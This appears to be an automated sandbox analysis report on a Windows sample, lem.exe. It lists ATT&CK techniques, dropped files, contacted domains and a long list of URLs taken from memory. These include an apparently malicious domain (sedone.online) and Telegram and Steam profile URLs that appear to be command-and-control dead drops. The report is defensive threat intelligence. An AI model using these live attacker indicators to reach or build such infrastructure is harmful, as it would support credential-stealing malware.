Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	1 DLL Side-Loading	NTDS	27 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Extra Window Memory Injection	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	121 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lem.exe	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\2N7Y58YCJW47\TR9Z5X	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\628056\Corrections.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://sedone.online	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
t.me	149.154.167.99	true	false	high
www.google.com	142.250.181.132	true	false	high
sedone.online	116.203.12.241	true	true	unknown
pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	false		high
https://duckduckgo.com/ac/?q=	Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	false		high
http://anglebug.com/4633	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/C	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/J	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/M	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/W	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/T	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/X	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/a	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/e	chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Corrections.com, 0000000A.00000000.1730066094.00000000009F5000.00000002.00000001.01000000.00000007.sdmp, Corrections.com.1.dr, Appeals.0.dr	false		high
https://issuetracker.google.com/161903006	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	false		high
https://drive-daily-1.corp.google.com/	chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.me/detct0rd0wntgMozilla/5.0	Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0	Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-preprod.corp.google.com/	chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Corrections.com, 0000000A.00000002.2820141571.0000000004532000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.dr	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sedone.online	Corrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6692	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000000F.00000003.2121360637.0000413000CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127554316.0000413000384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119669400.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127832603.0000413000CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127601269.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119776316.0000413000CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29	chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://labs.google.com/search?source=ntp	chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7604	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7761	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/hk	chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/app/so?eom=1	chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7760	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	false		high
http://anglebug.com/5901	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6439	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7406	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search	chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-autopush.corp.google.com/	chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.me/detct0rP	Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=$	chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
